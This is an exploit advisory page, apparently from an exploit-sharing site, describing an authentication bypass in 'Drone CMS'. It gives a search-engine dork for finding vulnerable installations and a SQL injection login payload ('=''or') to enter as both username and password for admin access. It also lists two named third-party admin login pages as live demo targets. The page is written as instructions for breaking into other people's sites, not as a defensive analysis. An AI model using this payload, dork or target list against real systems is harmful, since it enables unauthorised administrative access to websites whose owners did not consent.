facebook facebook twitter rss

Drone CMS Authentication Bypass Vulnerability

Author: Iran Cyber Security Group , Published: 08-06-2015
# Exploit Title : Drone CMS Authentication Bypass Vulnerability

# Date : 07/06/2015

# Exploit Author : Iran Cyber Security Group

# Software Link : www.drone.it

# Version : All Versions

# Category : Web Application Bugs

# Dork : "Drone CMS" or intext:Drone CMS

# Tested On : Windows

# Home : Iran-Cyber.Org

# Description :

By This Vulenarabity You Can Bypass Authentication And Get Logged In Like An Admin.


# Proof Of Concept :

First Find Targets By Searching The Dork In Search Engines Like Google,Bing,...

After You Selected Your Target Use This Exploit :

# http://admin.site

Then The Admin Page Comes,Use These Usernames And Passwords :

Username : '=''or'

Password : '=''or'


# Demo :

# http://admin.labarcella.it/

# http://admin.baudesign.it/login.php

Like us on Facebook :